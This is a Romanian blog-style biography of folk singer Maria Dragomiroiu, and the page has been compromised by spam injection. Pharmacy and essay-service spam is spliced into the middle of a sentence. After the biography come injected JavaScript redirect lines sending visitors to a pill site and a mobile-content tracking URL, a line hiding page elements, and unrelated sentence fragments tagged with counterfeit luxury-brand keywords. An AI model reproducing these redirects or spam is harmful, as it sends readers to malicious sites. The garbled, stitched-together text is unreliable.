Melodia zilei 20 noiembrie

maria-dragomiroiu-jean-constantin-mi-a-facut-curte

Maria Dragomiroiu, cantareata de muzica populara, s-a nascut pe 11 iulie 1955 in comuna Ionesti, satul Marcea din judetul Valcea.

Numai pe munca, respect, talent si modestie cineva isi poate cladi un nume ca ce al Mariei Dragomiroiu.

Pentru Maria, calitatea conteaza, nu cantitatea. De aceea, niciodata nu s-a gandit sa scoata zeci de albume doar de dragul de a fi in pas cu alti colegi de breasla.

`Marii artisti au trait si cu un singur cantec`, spunea Maria Dragomiroiu.

Exista artisti care ajung pe scena ca urmare a unui vis vechi ce le-a incordat toata fiinta an si an. In mintea si sufletul lor a incoltit dorinta de a se afla sub lumina reflectoarelor si de a bucura spectatorii si s-au straduit, canalizand tot zbuciumul lor spre aceasta reusita in lumea scenei.

Un astfel de artist care a visat frumos, si pana la urma visul a devenit arta, este Maria Dragomiroiu, femeia plina de sensibilitate si sufletism. De mica a plecat de sub aripa duioasa a mamei ei, femeie ambitioasa si de nadejde, a coborat din satul ei aflat pe dealurile blande ale Valcei si a urmat scoala in Bucuresti locuind la o matusa.

Maria Dragomiroiu s-a inscris la un liceu unde invatau feciori de stabi, traitori in cartierele cu staif ale Dorobantilor. Puiul de taran a reusit cu firea ei luminoasa sa-i cucereasca pe colegii veniti din protipendada comunista si n-a fost impovarata mai deloc de complexele copilului care asculta muzica la difuzorul prins intr-un cui in peretele casei taranesti.

Maria Dragomiroiu venea de cu zori la scoala, ca sa cante in clasa inca nepopulata de elevi. Fredona atat de frumos cantul popular incat primea si aplauze in scoala inca pustie in primele ore ale zorilor. O aplauda femeia de serviciu care se sprijinea in matura, vrajita de glasul micii oltence.

S-a inscris ambitioasa Maria Dragomiroiu, eleva de la Liceul “Caragiale” la concursul “Floarea din gradina”. A trecut primele etape eliminatorii cu note maxime insa la ultima etapa juriul a ezitat sa-i decerneze trofeul spunand ca glasul sau seamana cu al Mariei Tanase.

Maria Dragomiroiu le-a iubit teribil pe cele doua uriase Marii: Maria Lataretu si  best writing essay service Maria Tanase Tags: Buy Lamisil spray pump Buy Lamisil australia order lamisil online does generic lamisil work Buy Lamisil gel Buy Lamisil over the counter once 250 mgВ  , dar nici un moment nu si-a pus in gand sa le imite. Iar cariera ei superba de mai tarziu a aratat ca ea este Maria Dragomiroiu. Unica Maria Dragomiroiu. Pana la urma juriul i-a dat si la ultimul concurs nota 10 si Maria a plecat plangand de fericire cu trofeul “Floarea din gradina”, facandu-i pe razgaiatii colegi de liceu s-o numeasca “floricica noastra”.

Nasa copiilor ei, superba cantareata Ileana Sararoiu, a sustinut-o si i-a dirijat pasii, iar ambitia fetitei de taran s-a implinit si Maria Dragomiroiu este marea artista a cantului popular romanesc.

https://www.youtube.com/watch?v=Q5UjmHfU_P4
window.location = “http://cheap-pills-norx.com”;
window.location = “http://”;.

document.getElementById(“Leyout101″).style.display=”none”;The Lasting Impact of Nov

NovClear skies and golden sunshine, hot but not too hot (not for very long, anyway) and with wispy daytime breezes yielding to only slightly accelerated winds after dark.cheap ray bans sunglasses
riverwalk, which spans 1.mulberry sale uk
If you believe in Bitcoins, BUY THEM.prada bag

Jordan Football Association (JFA), in coordination with the Local Organizing Committee of the FIFA U 17 Women World Cup Jordan 2016 conducted the successful event on 27 February.prada wallet
Little did I know they were not.mcm backpack
Most importantly, how will I feel moving back to into the “minority” from the “dominant”.mcm bags
Saturday at King Cathedral Maui.cinture gucci

For example, he admitted contacting a girl in Butte County on Nov.mulberry sale uk
Witnesses described the shooter as a Hispanic man of average build, dark hair, clean shaven and possibly clad in a white V neck T shirt.portafoglio prada

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *